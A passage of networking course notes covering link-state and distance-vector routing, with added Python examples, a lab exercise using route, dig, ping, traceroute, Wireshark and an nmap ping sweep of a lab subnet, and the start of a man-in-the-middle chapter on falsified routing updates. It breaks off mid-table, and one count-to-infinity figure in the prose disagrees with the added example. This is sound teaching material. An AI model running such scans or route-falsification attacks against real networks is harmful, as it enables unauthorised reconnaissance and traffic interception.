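To make the two link state ideas concrete, here is an added worked example in Python (it is not code from these notes or from any real router): each router's LSP is installed in a link-state database only if its sequence number is higher than the copy already held, the database is turned into a graph, and Dijkstra's Algorithm computes the routing table, before and after the 18-26 link dies. The LSP of Router 26 uses the weights from the figure above; the links among Routers 18, 35 and 51, the rule that a link counts only when both ends advertise it (borrowed from OSPF's shortest-path calculation), and the late replay of the old LSP are assumptions of the example.

```python
import heapq

# Link-state database: origin router -> (sequence number, {neighbor: link weight}).
# Router 26's LSP carries the weights from the notes (18:4, 35:2, 51:3); the
# links among 18, 35 and 51 are constructed for this example.
INITIAL_LSPS = [
    ("26", 1, {"18": 4, "35": 2, "51": 3}),
    ("18", 1, {"26": 4, "35": 5}),
    ("35", 1, {"26": 2, "18": 5, "51": 2}),
    ("51", 1, {"26": 3, "35": 2}),
]

# After the 18-26 link dies, both ends re-advertise with a higher sequence number.
AFTER_FAILURE_LSPS = [
    ("26", 2, {"35": 2, "51": 3}),
    ("18", 2, {"35": 5}),
]


def install_lsp(lsdb, lsp):
    """Keep an LSP only if its sequence number beats the copy already held.

    Returns True when the LSP is new, i.e. the receiver should flood it on to its
    neighbors; False means it was already seen (or is stale) and is dropped.
    This is the controlled-flooding rule from the notes.
    """
    origin, seq, links = lsp
    held = lsdb.get(origin)
    if held is not None and held[0] >= seq:
        return False
    lsdb[origin] = (seq, dict(links))
    return True


def topology(lsdb):
    """Assemble the network graph from the database.

    Assumption (borrowed from OSPF): a link is used only if both endpoints still
    advertise it, so one stale LSP cannot keep a dead link alive on its own.
    """
    graph = {router: {} for router in lsdb}
    for origin, (_, links) in lsdb.items():
        for nbr, weight in links.items():
            back = lsdb.get(nbr)
            if back is not None and origin in back[1]:
                graph[origin][nbr] = weight
    return graph


def routing_table(graph, source):
    """Dijkstra's Algorithm from `source`: {destination: (next hop, total weight)}."""
    dist = {source: 0}
    next_hop = {}
    done = set()
    heap = [(0, source, None)]  # (distance so far, router, first hop on the path)
    while heap:
        d, router, first = heapq.heappop(heap)
        if router in done:
            continue
        done.add(router)
        if first is not None:
            next_hop[router] = first
        for nbr, weight in graph.get(router, {}).items():
            nd = d + weight
            if nbr not in dist or nd < dist[nbr]:
                dist[nbr] = nd
                # The next hop is the neighbor of `source` through which this path leaves.
                heapq.heappush(heap, (nd, nbr, nbr if router == source else first))
    return {dest: (next_hop[dest], dist[dest]) for dest in dist if dest != source}


def link_state_example():
    """Router 26's table before and after the 18-26 link dies, plus whether a
    late replay of 26's first LSP was accepted afterwards (it must not be)."""
    lsdb = {}
    for lsp in INITIAL_LSPS:
        install_lsp(lsdb, lsp)
    before = routing_table(topology(lsdb), "26")
    for lsp in AFTER_FAILURE_LSPS:
        install_lsp(lsdb, lsp)
    stale_accepted = install_lsp(lsdb, INITIAL_LSPS[0])  # old seq 1 arrives late
    after = routing_table(topology(lsdb), "26")
    return before, after, stale_accepted


if __name__ == "__main__":
    before, after, stale = link_state_example()
    print("before:", before)
    print("after: ", after)
    print("stale LSP accepted:", stale)
```

Before the failure Router 26 reaches Router 18 directly at cost 4; afterwards the only path is through Router 35 at cost 7, and the replayed sequence-1 LSP is rejected because the database already holds sequence 2.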
2. Distance Vector Routing
The other routing methodology is Distance Vector Routing (also variously called Bellman-Ford Routing or Ford-Fulkerson Routing).
A. Basic Idea. Each router maintains a table:
Destination router | My guess of best distance | Which outgoing line
• Each router learns its immediate (1-hop) neighbors and the distance to them.
• Each router shares its knowledge about the entire network with its neighbors. This table is called a vector of distances,
or, a distance vector. These tables are exchanged with neighbors only.
• When a router receives a distance vector from a neighbor, it uses that information to update its own distance vector.
• Routers send distance vectors periodically, whether or not changes have occurred.
To consider how the distance vector algorithm works, let's consider the network shown below.
[Figure: four routers in a line, A-B (weight 2), B-C (weight 4), C-D (weight 3); diagram not reproduced]
Initially, each of the four routers exchanges a Hello Packet with its neighbors, learning who their neighbors are, and the distance
to their neighbors. For example, Router B receives a Hello Packet from Router A and Router C, learning that these two routers
are a distance of 2 and 4 away, respectively. After this initial exchange, each of the four routers builds an initial routing table:
Router A: B 2
Router B: A 2, C 4
Router C: B 4, D 3
Router D: C 3
Now, every router shares its table with its neighbors.
Consider this exchange from Router A's perspective. Router A receives from Router B the distance vector shown above.
Router B: "Hey, Router A, I have an entry in my table for Router C. Router C is a distance of 4 away from me."
Router A: "Hey, Router A, you're a genius. But, Router B, you are a distance of 2 away from me, so… Router C
must be a distance of 6 away from me!!!"
So, Router A changes its routing table to:
Router A: B 2, C 6
Now, consider the matter from Router B's perspective. Router C tells Router B: "Router D is a distance of 3 away from me."
Router B then reasons: "Router C is a distance of 4 away from me, and Router D is a distance of 3 away from Router C, so
Router D must be a distance of 7 away from me." So, Router B changes its routing table to:
Router B: A 2, C 4, D 7
In a like manner, Router C and Router D change their routing tables based on the initial exchange. Thus, after the initial
exchange of packets is complete, the distance vectors are:
Router A: B 2, C 6
Router B: A 2, C 4, D 7
Router C: A 6, B 4, D 3
Router D: B 7, C 3
But… matters are not done yet! Now that routers have reconstituted their distance vectors, they exchange them again! Note
that distance vectors are exchanged with neighbors only. So, Router B tells Router A: "Router D is 7 away from me." Router
A then reasons: "Router D must be 9 away from me." After all Routers reevaluate their distance vectors, we have this:
Router A: B 2, C 6, D 9
Router B: A 2, C 4, D 7
Router C: A 6, B 4, D 3
Router D: A 9, B 7, C 3
Hopefully this example convinces you that even though distance vectors are only exchanged with immediate neighbors,
information about the full network will eventually percolate to all routers.
But you are likely wondering: Okay… all the routers have distance vectors, but how do they use them for routing? To fill in
this last piece of the distance-vector puzzle, let's show a more complex example (taken from the Tanenbaum text).
B. Distance Vector Routing
Consider the network shown on the left below. Further, suppose that for this scenario the weights used in the network
represent time delays. Obviously, we would like data to be routed with minimal delay.
You are Router J. Notice that you have four neighbors: A, I, H and K. Your delay to A is 8, your delay to I is 10,
your delay to H is 12 and your delay to K is 6. You receive the distance vectors shown below on the right (the first
column is the received distance vector from Router A, the second is from Router I, the third from Router H and the
last column is the received distance vector from Router K).
Your goal: Write down your new estimates of distances to all nodes, and annotate your distance vector showing the next router
on the best path to each destination.
[Figure: network and the four received distance vectors, from Tanenbaum, Computer Networks, 3rd ed.; not reproduced]
To see how you would accomplish this, let's focus on how you (Router J) would determine the best way to route a packet to
Router F.
• Your neighbor Router A is 8 away from you. Router A says to you: "I can get to F in 23." Thus, if you use Router A
as your next hop to Router F, you will get to Router F with a delay of 31.
• Your neighbor Router I is 10 away from you. Router I says to you: "I can get to F in 20." Thus, if you use Router I
as your next hop to Router F, you will get to Router F with a delay of 30.
• Your neighbor Router H is 12 away from you. Router H says to you: "I can get to F in 19." Thus, if you use Router
H as your next hop to Router F, you will get to Router F with a delay of 31.
• Your neighbor Router K is 6 away from you. Router K says to you: "I can get to F in 40." Thus, if you use Router K
as your next hop to Router F, you will get to Router F with a delay of 46.
Comparing these four values, you (Router J) conclude that the best way to route a packet to Router F is to send it to Router I.
The total delay from Router J to Router F will be 30.
Practice Problem 15.3
You are Router J. Notice that you have four neighbors: A, I, H and K. Your delay to A is 8, your delay to I is 10, your delay
to H is 12 and your delay to K is 6.[25] You receive the distance vectors shown below on the right (the first column is the received
distance vector from Router A, the second is from Router I, the third from Router H and the last column is the received distance
vector from Router K).
Write down your new estimates of distances to all nodes, and annotate your distance vector showing the next router on the best
path to each destination.
[Figure: network and the four received distance vectors, from Tanenbaum, Computer Networks, 3rd ed.; not reproduced]
Solution:
[25] Note that it is not necessary that the delay between two nodes be the same in each direction. So, for example, it is perfectly
valid for the delay from J to A to be 8, while the delay from A to J is a different value (e.g., 9).
C. The “Count to Infinity” Problem in Distance Vector Routing
Consider the three-node network shown below.
[Figure 22.17, Two-node instability, from Forouzan, Data Communications and Networking, McGraw Hill, 2007; diagram not reproduced]
Atop Node A and Node B, we show the entry in their routing table for Node X. Node X is a distance of 2 away from
Node A. Node X is a distance of 6 away from Node B. All is well.
Then Node X dies. Node A does not receive a Hello packet and realizes Node X must have died. It adjusts its routing
table to show that Node X is unreachable (a distance of infinity away).
Then, something weird happens, and it has nothing to do with the fact that the At Hoc alert announcing the active
shooter drill ended at 1046 did not actually get promulgated until 1245. Rather, this happens: Router A receives a
distance vector from Router B saying "I can reach Router X in a distance of 6."
Then…what do you do as Router A? You know that Router B is a distance of 4 away from you… and he's saying that
he can reach X in a distance of 6… You update your routing table!
Then you share your distance vector with B, and she updates her routing entry for X.
This exchange continues back and forth, until the cows come home, or until the cows come home blue in the face, or
until the cows come home blue in the face on a cold day in hell.
How can we limit or mitigate this instability? One proposed solution is to set some finite number = ∞. If we set, for
example, 30 = ∞, then after seven distance vector exchanges in the example above, both Router A and Router B would
have concluded that Router X was unreachable.
Most distance vector routing uses a hop-count metric, which means that the weight on each edge is equal to one. To
avoid the count-to-infinity problem, many algorithms set 16 = ∞.
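The distance vector exchanges narrated above, the Router J computation, and the count-to-infinity problem are all the same Bellman-Ford update, so here is one added Python example (not code from these notes) that runs it on the notes' own numbers: the A-B-C-D line converges to the tables shown, Router J picks Router I for Router F at delay 30, and after Router X dies Routers A and B count up until the chosen value of infinity (16 or 30) is reached. The assumption that routers recompute one at a time in a stated order, and the 100-round safety limit, are the example's own.

```python
INFINITY = 16  # as in the notes: hop-count distance vector protocols commonly set 16 = infinity


def dv_compute(me, my_links, vectors, infinity=INFINITY):
    """One Bellman-Ford update for router `me`.

    my_links: {neighbor: cost of the direct link to it}
    vectors:  {neighbor: {destination: distance that neighbor advertises}}
    Returns {destination: (next hop, distance)}; a distance that would exceed
    `infinity` is reported as `infinity`, i.e. unreachable.
    """
    table = {}
    for nbr, cost in my_links.items():
        for dest, advertised in vectors[nbr].items():
            if dest == me:
                continue
            total = min(cost + advertised, infinity)
            if dest not in table or total < table[dest][1]:
                table[dest] = (nbr, total)
    return table


def vector_of(me, table):
    """What a router advertises: every destination it knows, plus itself at 0."""
    vector = {dest: dist for dest, (_, dist) in table.items()}
    vector[me] = 0
    return vector


def initial_tables(links):
    """Tables right after the Hello exchange: direct neighbors only."""
    return {r: {n: (n, c) for n, c in nbrs.items()} for r, nbrs in links.items()}


def exchange(links, tables, order, infinity=INFINITY):
    """One round of exchanges. Assumption of this example: routers recompute one
    at a time in `order`, each reading its neighbors' most recent vectors, which
    is the sequence the notes narrate (A updates, then B, and so on)."""
    tables = {r: dict(t) for r, t in tables.items()}
    for me in order:
        vectors = {nbr: vector_of(nbr, tables[nbr]) for nbr in links[me]}
        tables[me] = dv_compute(me, links[me], vectors, infinity)
    return tables


# The four-router line from the notes: A-B 2, B-C 4, C-D 3.
LINE = {"A": {"B": 2}, "B": {"A": 2, "C": 4}, "C": {"B": 4, "D": 3}, "D": {"C": 3}}


def converge_line(rounds=2):
    """Distance vectors of the line after `rounds` exchanges."""
    tables = initial_tables(LINE)
    for _ in range(rounds):
        tables = exchange(LINE, tables, "ABCD")
    return tables


def count_to_infinity(infinity=INFINITY, max_rounds=100):
    """Two-node instability: X hangs off A (cost 2), A-B costs 4, then X dies.
    Returns (A's, B's) distance to X after each exchange until both give up."""
    links = {"X": {"A": 2}, "A": {"X": 2, "B": 4}, "B": {"A": 4}}
    tables = initial_tables(links)
    for _ in range(2):
        tables = exchange(links, tables, "XAB", infinity)
    # X dies: A misses its Hellos and marks X unreachable, but B still holds X at 6.
    links = {"A": {"B": 4}, "B": {"A": 4}}
    tables = {"A": {"B": ("B", 4), "X": ("X", infinity)}, "B": tables["B"]}
    history = []
    for _ in range(max_rounds):
        tables = exchange(links, tables, "AB", infinity)
        history.append((tables["A"]["X"][1], tables["B"]["X"][1]))
        if history[-1] == (infinity, infinity):
            break
    return history


def router_j_to_f():
    """Router J from the Tanenbaum example: delays to A, I, H, K are 8, 10, 12, 6
    and they advertise F at 23, 20, 19, 40. Delays are not hop counts, so no cap."""
    links = {"A": 8, "I": 10, "H": 12, "K": 6}
    vectors = {"A": {"F": 23}, "I": {"F": 20}, "H": {"F": 19}, "K": {"F": 40}}
    return dv_compute("J", links, vectors, infinity=float("inf"))["F"]


if __name__ == "__main__":
    for router, table in converge_line().items():
        print(router, table)
    print("J -> F via", router_j_to_f())
    print("count to 16:", count_to_infinity(16))
    print("count to 30:", count_to_infinity(30))
```

The history returned by count_to_infinity shows A and B each raising their estimate for X by 4 per exchange (10, 14, 18, ...) until the cap is hit; with the cap at 16 the two routers give up after two exchanges, with it at 30 they need four, and with no cap at all they would never stop.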
3. Routing Protocol Summary
Link State Routing:
o Each router does its own calculations (Dijkstra) independent of other routers.
o Convergence is better because calculations are local
o Better scalability
But...
o Uses flooding.
Distance Vector Routing:
o Is easy to implement
o In a static environment, the algorithm will correctly compute shortest paths to all destinations.
But...
o In a dynamic environment route computations might not stabilize and/or might be incorrect
o The algorithm does not scale well
Practice Problem 15.4
In the event that router G experienced a fatal power supply failure, which protocol would be best suited to recovering from this
failure and sharing correct routing information?
(a) Link State Routing
(b) Distance Vector Routing
(c) Both protocols are robust and would be unaffected by this anomaly.
Solution:
Problems
1. Concerning routing algorithms:
(a) Compare how well link-state algorithms and distance vector algorithms respond in the event of a router failure.
(b) Suppose a network uses distance vector routing. What would happen if a router sent a distance vector with all
zeroes?
(c) Describe the “count-to-infinity” problem. (Use a picture if you find it helpful.)
(d) In distance vector routing, each router receives distance vectors from (choose one):
(i) Every router in the network
(ii) Its one-hop neighbors
(iii) DHCP
(iv) The table set up by the network administrator
(v) Messages exchanged using ARP
2. Consider the network shown below which uses distance vector routing. You are router C. You have just received
the following distance vectors:
Destination | From B | From D | From E
A           | 4      | 17     | 8
B           | 0      | 11     | 6
C           | 8      | 6      | 2
D           | 13     | 0      | 10
E           | 7      | 8      | 0
F           | 2      | 10     | 4
Your distances to B, D and E are 7, 4 and 6, respectively. What is your new routing table (include the distance and
next hop for each destination)?
[Figure: network with Routers A, B, C, D, E and F; diagram not reproduced]
3. Consider the network whose graph is shown below. Assume link-state routing is used.
(a) Which routers does Router C send LSPs to?
(b) Sketch the LSP sent by Router C.
(c) Show the correct routing table for Router C
(d) Show the correct routing table for Router E
4. Determine the correct routing table for Router A in the figure below.
5. Fill in the blanks for the below statements that describe the two major categories of routing protocols.
(a) In _____________________ routing, a router will tell its immediate neighbors what it knows about the entire
network.
(b) In _____________________ routing, a router will tell the entire network what it knows about its immediate
neighbor (controlled flooding).
6. Complete the partial routing table for Router C for the destinations listed below.
Destination | Next element | Total cost
A           |              |
B           |              |
C           | ---          | 0
D           |              |
E           |              |
Security Exercise 15
Introduction
Let’s put to use the networking skills we have learned to date to better understand routing at the router.
1. Set-Up
Equipment required:
• Your issued Laptop.
o Turn off the wireless adapter.
o Connect the blue Ethernet cable at your desk to your issued laptop.
• A printed or electronic copy of this security exercise.
o If printed, separate the network diagram and answer sheet and have them ready to fill in.
• VMware Workstation
o Power on your Cyber2 VM, then click VM and Settings.
o Select Network Adapter and ensure that Connected, Connected at power on, and Bridged: Connected
directly to the physical network, and Replicate physical network connection state are selected or checked,
then click OK.
o Open a terminal in your Cyber2 VM and execute the command
sudo dhclient
Once it finishes, execute the command
ifconfig
Your screen should look similar to Figure 1 on page 366. Interface eth1 should be assigned an IP address
of 192.168.XX.1YY, where XX is your classroom number and YY is a number between 0 and 254. If
not, notify your instructor or lab technician.
Figure 1 – ifconfig executed after initial lab setup.
Part 1: Getting the Lay of the Land
2. Where Am I?
Locate EC310 MID on your network diagram. This is your Cyber2 VM which has just joined a virtual network in a virtual
world. You have an Ethernet card in your virtual machine called eth1 that has been assigned an IP address on the virtual
network.
• Identify a) your IP address and compute b) your network address and network mask in CIDR notation using the
information from ifconfig.
• Label parts a) and b) of your network diagram.
In order for your packets to leave this virtual network and venture out into the virtual world, your virtual machine must send
them to a Gateway Router. Router A is serving this purpose for the network you are connected to. To send your packets to
Router A and out into the world, you must know its IP address first.
• Execute the command
route -n
• Identify the IP address of the Gateway Router. Look under the Gateway column of the Kernel’s IP routing table
(see Figure 1 for reference). Recall that address 0.0.0.0 is used to represent any IP address and is not the
Gateway Router’s address.
• Label part c) of your network diagram.
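As an added example (not part of the exercise), the following Python carries out parts a) through c) on constructed ifconfig and route -n output laid out like Figure 1: the network address and CIDR mask come from the inet addr and Mask fields via the standard ipaddress module, and the gateway is the Gateway entry of the 0.0.0.0 row. The addresses in the sample text are made up; read your own from the VM.

```python
import ipaddress
import re

# Constructed sample output in the layout of `ifconfig` and `route -n` on the
# lab VM. The addresses are made up to match the 192.168.XX.1YY pattern the
# exercise describes; your own values will differ.
IFCONFIG_OUTPUT = """\
eth1      Link encap:Ethernet  HWaddr 00:0c:29:12:34:56
          inet addr:192.168.65.123  Bcast:192.168.65.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
"""

ROUTE_OUTPUT = """\
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         192.168.65.1    0.0.0.0         UG    0      0        0 eth1
192.168.65.0    0.0.0.0         255.255.255.0   U     1      0        0 eth1
"""


def interface_network(ifconfig_text):
    """Parts a) and b): the interface's IP address and its network in CIDR notation."""
    m = re.search(r"inet addr:(\S+)\s+.*?Mask:(\S+)", ifconfig_text)
    if m is None:
        raise ValueError("no IPv4 address found in ifconfig output")
    # ipaddress accepts a dotted mask and converts it to a prefix length.
    iface = ipaddress.ip_interface(f"{m.group(1)}/{m.group(2)}")
    return str(iface.ip), str(iface.network)


def default_gateway(route_text):
    """Part c): the Gateway of the 0.0.0.0 (default) route.

    A Gateway of 0.0.0.0 on a row means 'deliver directly on this link', so it is
    never the router's address; only the default row with a real gateway counts.
    """
    for line in route_text.splitlines():
        cols = line.split()
        if len(cols) >= 8 and cols[0] == "0.0.0.0" and cols[1] != "0.0.0.0":
            return cols[1]
    return None


def next_hop(destination, ifconfig_text, route_text):
    """Where the VM sends a packet: 'direct' for hosts on its own network,
    otherwise the gateway router's address (None if there is no default route)."""
    _, network = interface_network(ifconfig_text)
    if ipaddress.ip_address(destination) in ipaddress.ip_network(network):
        return "direct"
    return default_gateway(route_text)


if __name__ == "__main__":
    print("a), b):", interface_network(IFCONFIG_OUTPUT))
    print("c):    ", default_gateway(ROUTE_OUTPUT))
    print("to the webserver via:", next_hop("2.2.2.15", IFCONFIG_OUTPUT, ROUTE_OUTPUT))
```

On the sample text the VM sits at 192.168.65.123 on 192.168.65.0/24, its gateway is 192.168.65.1, and a packet for a host outside that /24 is handed to the gateway while a packet for another 192.168.65.x host is delivered directly.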
3. Where Do I Go Next?
In this virtual world there is an important website located at http://www.usna.edu.
• Verify the website www.usna.edu exists by opening Firefox and navigating to the website address. Access Firefox
by selecting Applications, Internet, Firefox from the system toolbar at the top of your virtual machine (see the figure
at the top of the next page for reference).
• Browse the website to see what information is available.
Question 1: Who maintains the website at www.usna.edu?
In order for your virtual machine to access this website it first must know the webserver’s IP address. Recall from SI110 that
the Domain Name System (DNS) provides a convenient way for us to remember a website’s name rather than a bunch of
numbers for an IP address. Both are interchangeable through a series of ‘phonebooks’ (DNS name servers) on the Internet
that perform lookups on our behalf. If you provide the phonebook (DNS name server) the name of the webserver you would
like to access, it will give you its IP address in response or vice versa as shown in the example in Figure 2 below.
Figure 2 – DNS query and response.
The query above was generated using a utility called dig to find the IP address for www.cynicalmids.tumblr.com. dig
allows you to query a DNS name server and resolve a name to its IP address.
• Identify the IP address of the website www.usna.edu by executing the following command
dig www.usna.edu
• Label part d) of your network diagram with the IP address belonging to the eth0 interface of the webserver
www.usna.edu.
4. How Do I Get There?
There are two methods to discover information about the path between you and the webserver www.usna.edu. The first
method is the utility ping with record route. It will tell you the IP addresses of the OUTGOING interfaces along the way to
and from the final destination.
Figure 3 – Example use of ping with record route option.
For example, in Figure 3, after the command
ping -R -c1 -n 2.2.2.15
is executed, the OUTGOING interfaces are listed in order beginning with:
1) 3.3.3.5 – the host computer’s interface.
2) 2.2.2.1 – Router A’s eth1.
3) 2.2.2.15 – the webserver’s interface.
The OUTGOING interfaces of the return trip are listed in order beginning with:
4) 2.2.2.15 – the webserver’s interface.
5) 3.3.3.1 – Router A’s eth0.
6) 3.3.3.5 – the host computer’s interface.
• Identify the IP addresses of the interfaces traversed between you and the webserver www.usna.edu using the ping
command (do not forget the -R and -c1 and -n options).
• Label parts e) through g) of your network diagram.
The second method is the utility traceroute, which works similar to ping, except it tells you the address of the
INCOMING interface along the path between you and your destination. For example, in Figure 4 on page 369, after the
command
traceroute -n 2.2.2.15
is executed, the INCOMING interfaces are listed in order beginning with:
1) 3.3.3.1 – Router A’s INCOMING interface.
2) 2.2.2.15 – the webserver’s interface.
• Execute a traceroute to the webserver www.usna.edu (do not forget the -n option).
Question 2: Compare your traceroute results with your network diagram. Did they match the expected results obtained
from the ping command?
Figure 4 – Example of traceroute command.
5. Is Anyone Else Out There?
Routers B and C are also present in this virtual world and are responsible for forwarding packets between the networks they are
connected to and learning about other networks from other routers. Recall from Lecture #15 that routers learn about each
other’s networks by using a routing protocol such as the Open Shortest Path First (OSPF) protocol. In OSPF, routers use
Link State Packets (LSPs) to communicate with each other and learn about the network topology. Let’s take a closer look at
this communication.
• Launch Wireshark (as root) by selecting Applications, Internet, Wireshark (as root) from the system toolbar at the
top of your virtual machine.
• Open the packet capture labeled sx15 in the ec310code folder in your home directory.
• Examine the captured OSPF hello packets in the packet details pane. Be sure to expand the OSPF Header and
the OSPF Hello Packet portions (see the figure at the top of the next page for reference). These packets were
captured from one of the routers in your virtual world.
Recall from Lesson 15 that in OSPF routers send Hello Packets at a specific interval in order to let other routers know they
are alive. This interval is called the Hello Interval.
Question 3: Using the information in the captured Hello Packets, what is the Hello Interval for the router they were
captured from? Verify the Hello Interval by observing the amount of time between two OSPF hello packets in your
packet capture. Is it equal to the Hello Interval?
If after a certain amount of time a router does not receive a Hello Packet from another router it deems that router to be ‘dead’
and removes all routes that were advertised by that router. The time duration before a router is declared dead is known as the
Dead Interval. This allows OSPF to respond well to dynamic changes in the network topology.
Question 4: What is the Dead Interval for the router’s captured Hello Packets? If you could stop a router’s hello
packets from being advertised, would you disable that router?
Hello Packets also serve the important function of beginning a neighbor association between two routers when they first
meet. Before the new routers agree to swap routing information they must agree on a basic set of parameters and become
neighbors first. A router begins this process by identifying itself in the OSPF Header of the packet under the Source
OSPF Router field.
Question 5: Look inside the OSPF Header of the captured Hello Packet. What IP address is listed in the Source OSPF
Router field (note: this IP address does not begin with 192.168.65.XX)?
This IP address is very important. It is known as the Router’s ID and uniquely identifies this router to all other routers.
Who is responsible for assigning IP addresses anyway? The network administrator is responsible for assigning IP addresses
among many other tasks in maintaining the network. They assign blocks of IP addresses as part of the design of the network
architecture to best meet the needs of their clients.
What are the routers talking about with each other and why do they need to communicate so often? There are a number of
internal measures routers use in order to increase efficiency and prevent unnecessary information from clogging up the network,
such as electing a Designated Router (DR) and Backup Designated Router (BDR) and managing Link State Updates (LSU).
To learn more about OSPF, see http://www.ietf.org/rfc/rfc2328.txt.
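As an added example (not part of the exercise and not a real capture), the following Python builds one OSPFv2 Hello packet from constructed values and then parses it using the field layout of RFC 2328, pulling out exactly the fields Questions 3 through 5 ask about: the Source OSPF Router (Router ID), the Hello Interval, the Dead Interval and the neighbors already heard from. The Router ID, timers and addresses are made up; the Wireshark capture is what you read in the lab.

```python
import ipaddress
import struct

# OSPFv2 packet header (RFC 2328, A.3.1) and the fixed part of a Hello packet
# (A.3.2); the fixed part is followed by a list of neighbor Router IDs.
OSPF_HEADER = struct.Struct("!BBH4s4sHH8s")  # version, type, length, Router ID, Area ID, checksum, AuType, Authentication
HELLO_FIXED = struct.Struct("!4sHBBI4s4s")   # Network Mask, HelloInterval, Options, Rtr Pri, RouterDeadInterval, DR, BDR
HELLO_TYPE = 1


def _packed(addr):
    return ipaddress.IPv4Address(addr).packed


def _dotted(raw):
    return str(ipaddress.IPv4Address(raw))


def build_hello(router_id, area_id, netmask, hello_interval, dead_interval, dr, bdr, neighbors):
    """Construct a Hello for the example (checksum 0, no authentication); not a real capture."""
    body = HELLO_FIXED.pack(_packed(netmask), hello_interval, 0x02, 1, dead_interval, _packed(dr), _packed(bdr))
    body += b"".join(_packed(n) for n in neighbors)
    header = OSPF_HEADER.pack(2, HELLO_TYPE, OSPF_HEADER.size + len(body),
                              _packed(router_id), _packed(area_id), 0, 0, bytes(8))
    return header + body


def parse_hello(packet):
    """Fields the exercise asks about: Source OSPF Router (Router ID), HelloInterval,
    RouterDeadInterval and the neighbors listed. Raises ValueError for anything
    that is not a well-formed OSPFv2 Hello, so a truncated packet is never trusted."""
    if len(packet) < OSPF_HEADER.size:
        raise ValueError("shorter than an OSPF header")
    version, ptype, length, rid, aid, _csum, _autype, _auth = OSPF_HEADER.unpack_from(packet)
    if version != 2 or ptype != HELLO_TYPE:
        raise ValueError("not an OSPFv2 Hello")
    if length < OSPF_HEADER.size + HELLO_FIXED.size or length > len(packet):
        raise ValueError("length field inconsistent with packet size")
    body = packet[OSPF_HEADER.size:length]
    mask, hello, _options, priority, dead, dr, bdr = HELLO_FIXED.unpack_from(body)
    tail = body[HELLO_FIXED.size:]
    if len(tail) % 4:
        raise ValueError("neighbor list is not a whole number of Router IDs")
    return {
        "router_id": _dotted(rid), "area_id": _dotted(aid), "network_mask": _dotted(mask),
        "hello_interval": hello, "dead_interval": dead, "priority": priority,
        "dr": _dotted(dr), "bdr": _dotted(bdr),
        "neighbors": [_dotted(tail[i:i + 4]) for i in range(0, len(tail), 4)],
    }


def is_well_formed_hello(packet):
    try:
        parse_hello(packet)
        return True
    except ValueError:
        return False


def neighbor_is_dead(seconds_since_last_hello, dead_interval):
    """Question 4: a neighbor whose Hellos stop is dropped once the Dead Interval
    elapses, and every route it advertised goes with it."""
    return seconds_since_last_hello >= dead_interval


# Constructed sample: a Router ID outside the 192.168.65.0/24 lab subnet, 10 s
# Hello and 40 s Dead timers, and one neighbor already seen.
SAMPLE_HELLO = build_hello("10.0.0.1", "0.0.0.0", "255.255.255.0", 10, 40,
                           "192.168.65.1", "0.0.0.0", ["10.0.0.2"])

if __name__ == "__main__":
    for field, value in parse_hello(SAMPLE_HELLO).items():
        print(f"{field:15} {value}")
```

The parser checks the length field against the bytes actually present before reading the Hello body, so a capture cut short (or a malformed packet) raises an error instead of yielding garbage timers; the same Router ID that the lab asks you to read from the Source OSPF Router field is what the header's third field carries.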
6. Could Anyone Hurt Me?
Lastly, an evil instructor (because aren’t all instructors evil?) is also present in this virtual world. He or she is located on the
5.5.5.0/25 network and your final task is to find him or her. nmap is a powerful utility which allows us to scan networks
and identify which hosts are active among many other useful tasks.
• Execute the command below to scan the 5.5.5.0/25 network and determine which hosts are ‘up’ (i.e., active). It
may take a few minutes.
nmap -sP 5.5.5.0/25
• Use traceroute or ping to identify the path to each of the hosts identified as ‘up’ by nmap.
Question 6: Using your network diagram and the results from traceroute or ping, what is the most likely IP address of
the evil instructor?
• Confirm the IP address identified with your instructor or lab technician.
• Label part h) of your network diagram.
• Use traceroute or ping to verify the interfaces between you and the evil instructor.
• Label parts i) through k) on your network diagram.
7. Clean Up
• VMware Workstation
o In the VMware Workstation menu click VM and Settings.
o Select Network Adapter and ensure that Connected, and Connected at power on, are unchecked, and
ensure that Host-only: A private network shared with the host is selected or checked, then click OK.
o Suspend your Cyber2 VM. Disconnect the blue Ethernet cable. Turn on your wireless adapter.
Security Exercise 15 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
[Network diagram for EC310 Security Exercise 15 & 16; not reproduced. Labels recoverable from the figure: EC310 MID (eth1, blank a; network blank b); RA (eth3, blank c; eth4; eth5); RB (eth2; eth3); RC (eth3; eth4; eth5); web www.usna.edu (eth0, blank d); EVL Evil Instructor (eth0, blank h) on 5.5.5.0/25; networks 1.1.1.0/29, 2.2.2.0/29, 4.4.4.0/24 (address 4.4.4.1), 4.4.5.0/24; further address blanks e, f, g, i, j, k and m (m is for SX#16 only).]
Chapter 16: The Man-In-The-Middle Attack
Objectives:
(a) Describe the Man-In-The-Middle (MITM) attack and list what advantages it provides the attacker.
(b) Construct a routing table based on a network diagram and manipulate a routing table to exploit a specific target.
(c) Describe the steps that should be taken to prevent false route injection and identify who is responsible for performing these
preventative actions and how they can be applied.
I. Trust
1. A Quick Review
Where are we at in our understanding of how networks interconnect? We’ve talked about routing
algorithms and how these weird things called routing tables are constructed; we’ve talked about the layers and protocols
involved in networking; we’ve also talked about addressing schemes and specifically how MAC addresses and IP addresses
are used; but, what is the point of all this?
Much like the host section in the first six weeks of EC310, we need to understand how networks work before we can manipulate
their operation and violate the principles of security. Much like a locksmith, once we understand how a lock operates, we know
that a key is not the only thing that can open a door.
If we are thinking like a locksmith about networks from a security perspective, what is the underlying assumption between
routers in the routing algorithms they use to construct their routing tables?
The assumption is that each router can trust the information that other routers are sending it.
That is, Router A assumes by default that Router B is telling the truth about the state of its links or the distance between it and
other routers.
But what happens when that is not the case? Would a machine ever lie to another machine? Are there evil machines out there
that want to do bad, mean, horrible things to people?
Gasp, what if it was true! Have you ever seen Terminator 2: Judgment Day!?
Sadly, most of your classmates were not born when this movie was released, but I highly recommend it for your Netflix queue.
You will not be able to call yourself a hacker until you watch it.
Practice Problem 16.1
Consider the network below. How would the routing tables evolve using distance vector routing?
Router A
Destination   Next Hop   Cost
B             B          4
C             C          5
D             -          ∞

Router B
Destination   Next Hop   Cost
A             A          4
C             -          ∞
D             D          2

Router C
Destination   Next Hop   Cost
A             A          5
B             -          ∞
D             D          2

Router D
Destination   Next Hop   Cost
A             -          ∞
B             B          2
C             C          2
Everyone shares its table with its neighbors.
Solution:
But what if Router C was evil and began to falsify information about its link to Router A; how would the routing table
change?
Router A
Destination   Next Hop   Cost
B             B          4
C             C          5
D             -          ∞

Router B
Destination   Next Hop   Cost
A             A          4
